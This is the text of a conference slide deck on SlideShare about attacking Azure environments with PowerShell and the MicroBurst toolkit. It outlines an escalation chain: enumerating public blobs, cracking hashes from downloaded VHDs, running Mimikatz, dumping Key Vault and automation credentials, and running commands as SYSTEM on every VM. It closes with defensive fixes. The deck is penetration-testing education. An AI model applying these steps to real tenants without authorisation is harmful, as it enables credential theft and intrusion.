SlideShare a Scribd company logo

BSides Portland - Attacking Azure Environments with PowerShell

Karl Fosaaen, profile picture
Karl Fosaaen

The document discusses techniques for extracting data from Azure environments using PowerShell, highlighting the importance of Azure management security. It outlines various Azure services, tools like Microburst, and demonstrates methods for unauthorized access and escalation. Recommendations for securing Azure accounts include limiting management access, addressing misconfigurations, and implementing multi-factor authentication.

Internet
Related topics:
Penetration-Testing
1 of 39
Downloaded 17 times
1
2
Most read
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
ATTACKING AZURE ENVIRONMENTS WITH POWERSHELL KARL FOSAAEN
2 Confidential & Proprietary WHO AM I Karl Fosaaen  Pen Tester  Password Cracker  Social Engineer  Blogger  Cloud Enthusiast  Homebrewer https://github.com/netspi https://blog.netspi.com/ Twitter - @kfosaaen
3 Confidential & Proprietary TALK OVERVIEW  Outline  Intro to Dumping Azure Data − Why/How  Azure Services Covered − AzureAD Users and Groups − Storage Accounts − AzureSQL − Passwords  Demos/Questions − Sample Escalation Process
4 Confidential & Proprietary4 Confidential & Proprietary DUMPING AZURE DATA
5 Confidential & Proprietary DUMPING AZURE DATA  Why do we want to dump data from Azure?  We frequently get Azure creds during assessments − Integrated AD (DCSync) + Fall2018 = Azure Access  Regular domain users can usually list info about Azure − Not regularly locked down  Azure infrastructure audits  Why can we do this?  Azure management is available over the internet  Frequently without MFA  Why do we want to automate this?  Doing a million PS commands by hand is annoying
6 Confidential & Proprietary DUMPING AZURE DATA  MicroBurst  GitHub Link - https://github.com/NetSPI/MicroBurst  Current Functions: ▪ Invoke-EnumerateAzureBlobs ▪ Invoke-EnumerateAzureSubDomains ▪ Get-AzurePasswords ▪ Get-AzureDomainInfo ▪ Get-MSOLDomainInfo  Module Dependencies: − Azure − AzureRM − MSOnline
7 Confidential & Proprietary AZURE PERMISSIONS  Permissions  Three Important Levels − Owner − Contributor − Reader  Additional Roles − Different Administrative/Reader Roles − Not hugely important here
8 Confidential & Proprietary DUMPING AZURE DATA  Ways to dump data from Azure  Azure Portal − Pros – Graphical interface, easy to look at for review − Cons – Not great at scale  REST APIs − Pros – Structured, JSON return data − Cons – Authentication pain points, JSON data formatting  PowerShell Cmdlets − Pros − Integrated Auth − Data returned as pipeline-able objects − Easier output − Can handle data at scale − Cons − Limited threading options
9 Confidential & Proprietary DUMPING AZURE DATA  PowerShell Cmdlet Modules  Azure Service Management (ASM) − Older style of Azure Administration  AzureRM − Newer option for Resource Management  AZ − Latest option, currently in preview − Will eventually replace AzureRM  MSOnline − Office 365 Administration − When you don’t have rights to run the others
10 Confidential & Proprietary DUMPING AZURE DATA  Existing Tools − Azucar - https://github.com/nccgroup/azucar/ − Didn’t quite fit my use cases − Didn’t work well with several of the environments I tried − AzuriteExplorer - https://github.com/mwrlabs/Azurite − Similar functionality − Doesn’t appear to be actively maintained (broken AzureRM cmdlets)
11 Confidential & Proprietary DUMPING AZURE DATA  Required Reading  Pentesting Azure Applications - Matt Burrough − https://nostarch.com/azure  Clearly outlines testing process  Explains why you should be doing this  Good example scripts
12 Confidential & Proprietary12 Confidential & Proprietary AZURE SERVICES
13 Confidential & Proprietary AZURE SERVICES  Here are some of the services that we’ll cover in this talk  MicroBurst dumps more data than this, but we don’t have time to cover everything − Authenticated − AzureAD Users and Groups − Storage Accounts − App Services − AzureSQL − NSG/Firewall Rules − RBAC Roles − Passwords − Unauthenticated − Azure Blob Storage Enumeration − General Azure Services Enumeration
14 Confidential & Proprietary AZURE SERVICES  AzureAD  Users and Groups − Additional Recon Info − Phone Numbers − Enrolled Devices − Third Party Apps (SSO Integration) − Guest Users  Practical Examples − Password Guessing Attacks − Phishing − Accessing third party apps (AWS, WebEx, HR/Expense systems) − Office365
15 Confidential & Proprietary AZURE SERVICES  Storage Accounts  Naming Structure - netspiazure.*Service*.core.windows.net  Data Types − Blobs (blob) − File Services (file) − Data Tables (table) − Queues (queue)
16 Confidential & Proprietary AZURE SERVICES  Anonymous Blob Enumeration  Enumerate Storage Accounts − DNS lookups on keywords − Bing Searches to expand the scope  Enumerate Public Folders − Azure REST APIs  Practical Examples − Config files − VHD files − PII/Passwords − Hosting Payloads  Blog Post - https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
17 Confidential & Proprietary AZURE SERVICES  Azure SQL  Microsoft SQL – In the Cloud  Data Access − Firewall rules requirements − SQL Management Studio − Direct Portal Access  Azure SQL as a C2 -------------→  Practical Examples − Dev ENV − Open FW rules − Weak SA Password
18 Confidential & Proprietary AZURE SERVICES  Passwords  Key Vaults − Keys − Certs − Passwords  App Services Configurations − Deployment Credentials − Database Connection Strings  Automation Accounts − Credentials for Azure Automation accounts  Blog Post - https://blog.netspi.com/get-azurepasswords/
19 Confidential & Proprietary AZURE SERVICES  Passwords  Automation Accounts − Credentials for Azure Automation accounts − Process: − Create Automation Script − Import Automation Script − Run Automation Script − Get Automation Script Output − Delete Automation Script  Blog Post - https://blog.netspi.com/get-azurepasswords/
20 Confidential & Proprietary MICROBURST USAGE  MicroBurst  How to Run the Tools − Import the Module − Import-Module C:MicroBurstMicroBurst.psm1 -Verbose  CMD Examples − Invoke-EnumerateAzureBlobs -Base microburst − Invoke-EnumerateAzureSubDomains -Base microburst –Verbose − Get-AzurePasswords -Verbose | Out-GridView − Get-AzureDomainInfo –folder MicroBurst –Verbose − Get-MSOLDomainInfo –folder MicroBurst –Verbose
21 Confidential & Proprietary21 Confidential & Proprietary DEMO
22 Confidential & Proprietary DEMO  Sample Escalation  Anonymously enumerate a public blob storage container (Invoke-EnumerateAzureBlobs) − List files − Download VHD − Parse credentials from VHD file − Crack hashes for Local Creds and Cached Creds − Run VHD locally − Login to VM (via RDP) − Login to Azure with the cracked domain creds  Connect as domain user and dump domain info (Get-AzureDomainInfo) − List out users/services/etc.  Dump remaining domain passwords for Azure subscription (Get-AzurePasswords) − Get VPN access, pivot to internal domain/network  Execute Commands on all Azure VMs (as nt authoritySYSTEM)
23 Confidential & Proprietary
24 Confidential & Proprietary
25 Confidential & Proprietary CRACKING LOCAL ADMIN
26 Confidential & Proprietary LOCAL ADMIN -> LOAD VHD IN HYPER-V
27 Confidential & Proprietary LOCAL ADMIN -> RDP -> MIMIKATZ *Ideal Situation ktest also happens to be a DA RDP is open to everywhere
28 Confidential & Proprietary GRABBING CACHED CREDENTIALS *Slightly more realistic situation RDP is not open But the system is domain joined
29 Confidential & Proprietary CRACKING CACHED CREDENTIALS *Slightly more realistic situation RDP is not open But the system is domain joined
30 Confidential & Proprietary
31 Confidential & Proprietary
32 Confidential & Proprietary DEMO - CODE EXECUTION  Execute Commands on all Azure VMs (as nt authoritySYSTEM) − Invoke-AzureRmVMRunCommand − Requires “Contributor” rights  Practical Uses − Mimikatz everything − Task C2 agents − Search for data  Not Practical Uses − Botnets − Crypto miners − Delete everything  Mileage may vary depending on VM/Region
33 Confidential & Proprietary DEMO - CODE EXECUTION
34 Confidential & Proprietary34 Confidential & Proprietary FIXES/CONCLUSIONS
35 Confidential & Proprietary FIXES / CONCLUSIONS  Fixes  Limit Azure Management access for non-admin users  Watch out for misconfigurations in your Azure environment  Try to get users to stop using Fall2018 as a password  Set up MFA for all users with Azure access  Conclusions  The cloud is complicated, misconfigurations will happen  But there are options for mitigating the risks
36 Confidential & Proprietary36 Confidential & Proprietary QUESTIONS
37 Confidential & Proprietary Thanks! NetSPI co-workers for the QA/Testing/Ideas All of you who came to a Saturday afternoon talk And all of you watching this on YouTube
38 Confidential & Proprietary ADDITIONAL INFO  MicroBurst GitHub - https://github.com/NetSPI/MicroBurst  NetSPI Blog - https://blog.netspi.com  MicroBurst Specific Blogs:  https://blog.netspi.com/get-azurepasswords/  https://blog.netspi.com/anonymously-enumerating-azure-file-resources/  https://blog.netspi.com/enumerating-azure-services/  Twitter - @kfosaaen  SlideShare - http://www.slideshare.net/kfosaaen
MINNEAPOLIS | NEW YORK | PORTLAND | DENVER | DALLAS https://www.netspi.com https://www.facebook.com/netspi @NetSPI https://www.slideshare.net/NetSPI

More Related Content

PDF
DerbyCon 8 - Attacking Azure Environments with PowerShell
Karl Fosaaen
 
PDF
Identity Security - Azure Identity Protection
Eng Teong Cheah
 
PDF
Demystifying Initial Access in Azure
Gabriel Mathenge
 
PDF
初心者でもわかるActive directoryの基本
Sho Okada
 
PDF
[금융고객을 위한 AWS re:Invent 2022 re:Cap] 3.AWS reInvent 2022 Technical Highlights...
AWS Korea 금융산업팀
 
DOCX
SIZMA TESTLERİNDE BİLGİ TOPLAMA
BGA Cyber Security
 
PPTX
Azure Site Recovery Bootcamp
Asaf Nakash
 
PPTX
SCUGJ第27回勉強会:ものすごくざっくりなAzure Filesの話
wind06106
 
DerbyCon 8 - Attacking Azure Environments with PowerShell
Karl Fosaaen
 
Identity Security - Azure Identity Protection
Eng Teong Cheah
 
Demystifying Initial Access in Azure
Gabriel Mathenge
 
初心者でもわかるActive directoryの基本
Sho Okada
 
[금융고객을 위한 AWS re:Invent 2022 re:Cap] 3.AWS reInvent 2022 Technical Highlights...
AWS Korea 금융산업팀
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
BGA Cyber Security
 
Azure Site Recovery Bootcamp
Asaf Nakash
 
SCUGJ第27回勉強会:ものすごくざっくりなAzure Filesの話
wind06106
 

What's hot (20)

PPTX
第15回JSSUG「Azure SQL Database 超入門」
裕之 木下
 
PPTX
Azure AD とアプリケーションを SAML 連携する際に陥る事例と対処方法について
Shinya Yamaguchi
 
PDF
機密データとSaaSは共存しうるのか!?セキュリティー重視のユーザー層を取り込む為のネットワーク通信のアプローチ
Amazon Web Services Japan
 
PDF
Web Uygulama Pentest Eğitimi
BGA Cyber Security
 
PDF
IDaaS を正しく活用するための認証基盤設計 ~Azure Active Directory の構成パターン詳細~
Trainocate Japan, Ltd.
 
PPTX
Secure your M365 resources using Azure AD Identity Governance
Vignesh Ganesan I Microsoft MVP
 
PPTX
Azure App Service Deep Dive
Azure Riyadh User Group
 
PPTX
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PDF
【de:code 2020】 今すぐはじめたい SQL Database のかしこい使い分け術 前編
日本マイクロソフト株式会社
 
PPTX
AWS Simple Storage Service (s3)
zekeLabs Technologies
 
PPTX
Azure - Identity as a service
BizTalk360
 
PPTX
Azure Active Directory - An Introduction
Venkatesh Narayanan
 
PPTX
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
Simplilearn
 
PDF
Access Security - Privileged Identity Management
Eng Teong Cheah
 
PDF
Az 104 session 3 azure compute
AzureEzy1
 
PPTX
Azure AD Connect
Sasha Rosenbaum
 
PDF
CML-Personal (VIRL2)のインストールと基本機能
akira6592
 
PDF
Insight into Azure Active Directory #02 - Azure AD B2B Collaboration New Feat...
Kazuki Takai
 
PDF
AWS LambdaとDynamoDBがこんなにツライはずがない #ssmjp
Masahiro NAKAYAMA
 
PDF
Az 900 Session 3 Security, privacy, compliance, trust, pricing, SLA and Lifec...
AzureEzy1
 
第15回JSSUG「Azure SQL Database 超入門」
裕之 木下
 
Azure AD とアプリケーションを SAML 連携する際に陥る事例と対処方法について
Shinya Yamaguchi
 
機密データとSaaSは共存しうるのか!?セキュリティー重視のユーザー層を取り込む為のネットワーク通信のアプローチ
Amazon Web Services Japan
 
Web Uygulama Pentest Eğitimi
BGA Cyber Security
 
IDaaS を正しく活用するための認証基盤設計 ~Azure Active Directory の構成パターン詳細~
Trainocate Japan, Ltd.
 
Secure your M365 resources using Azure AD Identity Governance
Vignesh Ganesan I Microsoft MVP
 
Azure App Service Deep Dive
Azure Riyadh User Group
 
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
【de:code 2020】 今すぐはじめたい SQL Database のかしこい使い分け術 前編
日本マイクロソフト株式会社
 
AWS Simple Storage Service (s3)
zekeLabs Technologies
 
Azure - Identity as a service
BizTalk360
 
Azure Active Directory - An Introduction
Venkatesh Narayanan
 
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
Simplilearn
 
Access Security - Privileged Identity Management
Eng Teong Cheah
 
Az 104 session 3 azure compute
AzureEzy1
 
Azure AD Connect
Sasha Rosenbaum
 
CML-Personal (VIRL2)のインストールと基本機能
akira6592
 
Insight into Azure Active Directory #02 - Azure AD B2B Collaboration New Feat...
Kazuki Takai
 
AWS LambdaとDynamoDBがこんなにツライはずがない #ssmjp
Masahiro NAKAYAMA
 
Az 900 Session 3 Security, privacy, compliance, trust, pricing, SLA and Lifec...
AzureEzy1
 
Ad

Similar to BSides Portland - Attacking Azure Environments with PowerShell (20)

PDF
PoC Azure Administration
Olaf Reitmaier Veracierta
 
PPTX
[Toroman/Kranjac] Red Team vs. Blue Team in Microsoft Cloud
European Collaboration Summit
 
PPTX
Azure Fundamentals Part 3
CCG
 
PPTX
Azure Powershell. Azure Automation
Alexander Feschenko
 
PDF
O365Con18 - Red Team vs Blue Team - Sasha Kranjac & Mustafa Toroman
NCCOMMS
 
PPTX
Enter The Matrix Securing Azure’s Assets
BizTalk360
 
PDF
Microsoft security compass presentation latest
Kali860857
 
PPTX
security-compass-presentation-microsft.pptx
HichamNiamane1
 
PDF
Azure Incident Response Cheat Sheet.pdf
Christopher Doman
 
PDF
AZ-900 Summary with all information that
FadiAlkanani1
 
PPTX
Getting Started in Pentesting the Cloud: Azure
Beau Bullock
 
PDF
Css sf azure_8-9-17-microsoft_azure_security_overview_babak suzani_msft
Alert Logic
 
PPTX
Introduction to basic governance in Azure - #GABDK
Peter Selch Dahl
 
PDF
DEF CON 27 - DIRK JAN MOLLEMA - im in your cloud pwning your azure environment
Felipe Prado
 
PDF
Microsoft Windows Azure - Security Best Practices for Developing Windows Azur...
Microsoft Private Cloud
 
PDF
TechDays Finland 2020: Azuren tietoturva haltuun!
Karl Ots
 
PDF
CSS17: Houston - Azure Shared Security Model Overview
Alert Logic
 
PPTX
Microsoft Azure News - May 2025 - BAUG _
Daniel Toomey
 
PDF
Presentation adopting cloud computing
xKinAnx
 
PDF
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
MSAdvAnalytics
 
PoC Azure Administration
Olaf Reitmaier Veracierta
 
[Toroman/Kranjac] Red Team vs. Blue Team in Microsoft Cloud
European Collaboration Summit
 
Azure Fundamentals Part 3
CCG
 
Azure Powershell. Azure Automation
Alexander Feschenko
 
O365Con18 - Red Team vs Blue Team - Sasha Kranjac & Mustafa Toroman
NCCOMMS
 
Enter The Matrix Securing Azure’s Assets
BizTalk360
 
Microsoft security compass presentation latest
Kali860857
 
security-compass-presentation-microsft.pptx
HichamNiamane1
 
Azure Incident Response Cheat Sheet.pdf
Christopher Doman
 
AZ-900 Summary with all information that
FadiAlkanani1
 
Getting Started in Pentesting the Cloud: Azure
Beau Bullock
 
Css sf azure_8-9-17-microsoft_azure_security_overview_babak suzani_msft
Alert Logic
 
Introduction to basic governance in Azure - #GABDK
Peter Selch Dahl
 
DEF CON 27 - DIRK JAN MOLLEMA - im in your cloud pwning your azure environment
Felipe Prado
 
Microsoft Windows Azure - Security Best Practices for Developing Windows Azur...
Microsoft Private Cloud
 
TechDays Finland 2020: Azuren tietoturva haltuun!
Karl Ots
 
CSS17: Houston - Azure Shared Security Model Overview
Alert Logic
 
Microsoft Azure News - May 2025 - BAUG _
Daniel Toomey
 
Presentation adopting cloud computing
xKinAnx
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
MSAdvAnalytics
 
Ad

Recently uploaded (20)

PDF
SASE Traffic Flow - ZTNA Connector-1.pdf
mackwell7777
 
PPTX
Digital Literacy And Online Safety on internet
riksa rifqi
 
PDF
Sims 4 Historia para lo sims 4 para jugar
lolpopy34
 
PPT
Ethics in Information System - Management Information System
faizhossain3
 
PDF
Exploring VPS Hosting Trends for SMBs in 2025
Liquid Web
 
PPTX
E -tech empowerment technologies PowerPoint
kylebalatero12
 
PDF
Slides PDF The World Game (s) Eco Economic Epochs.pdf
Steven McGee
 
PPTX
PptxGenJS_Demo_Chart_20250317130215833.pptx
itruongva
 
PPTX
SAP Ariba Sourcing PPT for learning material
NKKumar16
 
PPTX
522797556-Unit-2-Temperature-measurement-1-1.pptx
msar8888
 
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
DOCX
Unit-3 cyber security network security of internet system
shivangisharma636228
 
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
PPTX
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
PDF
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
PDF
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
PDF
Decoding a Decade: 10 Years of Applied CTI Discipline
Andreas Sfakianakis
 
PPTX
Slides PPTX World Game (s) Eco Economic Epochs.pptx
Steven McGee
 
PDF
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
PPTX
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 
SASE Traffic Flow - ZTNA Connector-1.pdf
mackwell7777
 
Digital Literacy And Online Safety on internet
riksa rifqi
 
Sims 4 Historia para lo sims 4 para jugar
lolpopy34
 
Ethics in Information System - Management Information System
faizhossain3
 
Exploring VPS Hosting Trends for SMBs in 2025
Liquid Web
 
E -tech empowerment technologies PowerPoint
kylebalatero12
 
Slides PDF The World Game (s) Eco Economic Epochs.pdf
Steven McGee
 
PptxGenJS_Demo_Chart_20250317130215833.pptx
itruongva
 
SAP Ariba Sourcing PPT for learning material
NKKumar16
 
522797556-Unit-2-Temperature-measurement-1-1.pptx
msar8888
 
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
Unit-3 cyber security network security of internet system
shivangisharma636228
 
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
Decoding a Decade: 10 Years of Applied CTI Discipline
Andreas Sfakianakis
 
Slides PPTX World Game (s) Eco Economic Epochs.pptx
Steven McGee
 
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 

BSides Portland - Attacking Azure Environments with PowerShell

  • 1. ATTACKING AZURE ENVIRONMENTS WITH POWERSHELL KARL FOSAAEN
  • 2. 2 Confidential & Proprietary WHO AM I Karl Fosaaen  Pen Tester  Password Cracker  Social Engineer  Blogger  Cloud Enthusiast  Homebrewer https://github.com/netspi https://blog.netspi.com/ Twitter - @kfosaaen
  • 3. 3 Confidential & Proprietary TALK OVERVIEW  Outline  Intro to Dumping Azure Data − Why/How  Azure Services Covered − AzureAD Users and Groups − Storage Accounts − AzureSQL − Passwords  Demos/Questions − Sample Escalation Process
  • 4. 4 Confidential & Proprietary4 Confidential & Proprietary DUMPING AZURE DATA
  • 5. 5 Confidential & Proprietary DUMPING AZURE DATA  Why do we want to dump data from Azure?  We frequently get Azure creds during assessments − Integrated AD (DCSync) + Fall2018 = Azure Access  Regular domain users can usually list info about Azure − Not regularly locked down  Azure infrastructure audits  Why can we do this?  Azure management is available over the internet  Frequently without MFA  Why do we want to automate this?  Doing a million PS commands by hand is annoying
  • 6. 6 Confidential & Proprietary DUMPING AZURE DATA  MicroBurst  GitHub Link - https://github.com/NetSPI/MicroBurst  Current Functions: ▪ Invoke-EnumerateAzureBlobs ▪ Invoke-EnumerateAzureSubDomains ▪ Get-AzurePasswords ▪ Get-AzureDomainInfo ▪ Get-MSOLDomainInfo  Module Dependencies: − Azure − AzureRM − MSOnline
  • 7. 7 Confidential & Proprietary AZURE PERMISSIONS  Permissions  Three Important Levels − Owner − Contributor − Reader  Additional Roles − Different Administrative/Reader Roles − Not hugely important here
  • 8. 8 Confidential & Proprietary DUMPING AZURE DATA  Ways to dump data from Azure  Azure Portal − Pros – Graphical interface, easy to look at for review − Cons – Not great at scale  REST APIs − Pros – Structured, JSON return data − Cons – Authentication pain points, JSON data formatting  PowerShell Cmdlets − Pros − Integrated Auth − Data returned as pipeline-able objects − Easier output − Can handle data at scale − Cons − Limited threading options
  • 9. 9 Confidential & Proprietary DUMPING AZURE DATA  PowerShell Cmdlet Modules  Azure Service Management (ASM) − Older style of Azure Administration  AzureRM − Newer option for Resource Management  AZ − Latest option, currently in preview − Will eventually replace AzureRM  MSOnline − Office 365 Administration − When you don’t have rights to run the others
  • 10. 10 Confidential & Proprietary DUMPING AZURE DATA  Existing Tools − Azucar - https://github.com/nccgroup/azucar/ − Didn’t quite fit my use cases − Didn’t work well with several of the environments I tried − AzuriteExplorer - https://github.com/mwrlabs/Azurite − Similar functionality − Doesn’t appear to be actively maintained (broken AzureRM cmdlets)
  • 11. 11 Confidential & Proprietary DUMPING AZURE DATA  Required Reading  Pentesting Azure Applications - Matt Burrough − https://nostarch.com/azure  Clearly outlines testing process  Explains why you should be doing this  Good example scripts
  • 12. 12 Confidential & Proprietary12 Confidential & Proprietary AZURE SERVICES
  • 13. 13 Confidential & Proprietary AZURE SERVICES  Here are some of the services that we’ll cover in this talk  MicroBurst dumps more data than this, but we don’t have time to cover everything − Authenticated − AzureAD Users and Groups − Storage Accounts − App Services − AzureSQL − NSG/Firewall Rules − RBAC Roles − Passwords − Unauthenticated − Azure Blob Storage Enumeration − General Azure Services Enumeration
  • 14. 14 Confidential & Proprietary AZURE SERVICES  AzureAD  Users and Groups − Additional Recon Info − Phone Numbers − Enrolled Devices − Third Party Apps (SSO Integration) − Guest Users  Practical Examples − Password Guessing Attacks − Phishing − Accessing third party apps (AWS, WebEx, HR/Expense systems) − Office365
  • 15. 15 Confidential & Proprietary AZURE SERVICES  Storage Accounts  Naming Structure - netspiazure.*Service*.core.windows.net  Data Types − Blobs (blob) − File Services (file) − Data Tables (table) − Queues (queue)
  • 16. 16 Confidential & Proprietary AZURE SERVICES  Anonymous Blob Enumeration  Enumerate Storage Accounts − DNS lookups on keywords − Bing Searches to expand the scope  Enumerate Public Folders − Azure REST APIs  Practical Examples − Config files − VHD files − PII/Passwords − Hosting Payloads  Blog Post - https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
  • 17. 17 Confidential & Proprietary AZURE SERVICES  Azure SQL  Microsoft SQL – In the Cloud  Data Access − Firewall rules requirements − SQL Management Studio − Direct Portal Access  Azure SQL as a C2 -------------→  Practical Examples − Dev ENV − Open FW rules − Weak SA Password
  • 18. 18 Confidential & Proprietary AZURE SERVICES  Passwords  Key Vaults − Keys − Certs − Passwords  App Services Configurations − Deployment Credentials − Database Connection Strings  Automation Accounts − Credentials for Azure Automation accounts  Blog Post - https://blog.netspi.com/get-azurepasswords/
  • 19. 19 Confidential & Proprietary AZURE SERVICES  Passwords  Automation Accounts − Credentials for Azure Automation accounts − Process: − Create Automation Script − Import Automation Script − Run Automation Script − Get Automation Script Output − Delete Automation Script  Blog Post - https://blog.netspi.com/get-azurepasswords/
  • 20. 20 Confidential & Proprietary MICROBURST USAGE  MicroBurst  How to Run the Tools − Import the Module − Import-Module C:MicroBurstMicroBurst.psm1 -Verbose  CMD Examples − Invoke-EnumerateAzureBlobs -Base microburst − Invoke-EnumerateAzureSubDomains -Base microburst –Verbose − Get-AzurePasswords -Verbose | Out-GridView − Get-AzureDomainInfo –folder MicroBurst –Verbose − Get-MSOLDomainInfo –folder MicroBurst –Verbose
  • 21. 21 Confidential & Proprietary21 Confidential & Proprietary DEMO
  • 22. 22 Confidential & Proprietary DEMO  Sample Escalation  Anonymously enumerate a public blob storage container (Invoke-EnumerateAzureBlobs) − List files − Download VHD − Parse credentials from VHD file − Crack hashes for Local Creds and Cached Creds − Run VHD locally − Login to VM (via RDP) − Login to Azure with the cracked domain creds  Connect as domain user and dump domain info (Get-AzureDomainInfo) − List out users/services/etc.  Dump remaining domain passwords for Azure subscription (Get-AzurePasswords) − Get VPN access, pivot to internal domain/network  Execute Commands on all Azure VMs (as nt authoritySYSTEM)
  • 23. 23 Confidential & Proprietary
  • 24. 24 Confidential & Proprietary
  • 25. 25 Confidential & Proprietary CRACKING LOCAL ADMIN
  • 26. 26 Confidential & Proprietary LOCAL ADMIN -> LOAD VHD IN HYPER-V
  • 27. 27 Confidential & Proprietary LOCAL ADMIN -> RDP -> MIMIKATZ *Ideal Situation ktest also happens to be a DA RDP is open to everywhere
  • 28. 28 Confidential & Proprietary GRABBING CACHED CREDENTIALS *Slightly more realistic situation RDP is not open But the system is domain joined
  • 29. 29 Confidential & Proprietary CRACKING CACHED CREDENTIALS *Slightly more realistic situation RDP is not open But the system is domain joined
  • 30. 30 Confidential & Proprietary
  • 31. 31 Confidential & Proprietary
  • 32. 32 Confidential & Proprietary DEMO - CODE EXECUTION  Execute Commands on all Azure VMs (as nt authoritySYSTEM) − Invoke-AzureRmVMRunCommand − Requires “Contributor” rights  Practical Uses − Mimikatz everything − Task C2 agents − Search for data  Not Practical Uses − Botnets − Crypto miners − Delete everything  Mileage may vary depending on VM/Region
  • 33. 33 Confidential & Proprietary DEMO - CODE EXECUTION
  • 34. 34 Confidential & Proprietary34 Confidential & Proprietary FIXES/CONCLUSIONS
  • 35. 35 Confidential & Proprietary FIXES / CONCLUSIONS  Fixes  Limit Azure Management access for non-admin users  Watch out for misconfigurations in your Azure environment  Try to get users to stop using Fall2018 as a password  Set up MFA for all users with Azure access  Conclusions  The cloud is complicated, misconfigurations will happen  But there are options for mitigating the risks
  • 36. 36 Confidential & Proprietary36 Confidential & Proprietary QUESTIONS
  • 37. 37 Confidential & Proprietary Thanks! NetSPI co-workers for the QA/Testing/Ideas All of you who came to a Saturday afternoon talk And all of you watching this on YouTube
  • 38. 38 Confidential & Proprietary ADDITIONAL INFO  MicroBurst GitHub - https://github.com/NetSPI/MicroBurst  NetSPI Blog - https://blog.netspi.com  MicroBurst Specific Blogs:  https://blog.netspi.com/get-azurepasswords/  https://blog.netspi.com/anonymously-enumerating-azure-file-resources/  https://blog.netspi.com/enumerating-azure-services/  Twitter - @kfosaaen  SlideShare - http://www.slideshare.net/kfosaaen
  • 39. MINNEAPOLIS | NEW YORK | PORTLAND | DENVER | DALLAS https://www.netspi.com https://www.facebook.com/netspi @NetSPI https://www.slideshare.net/NetSPI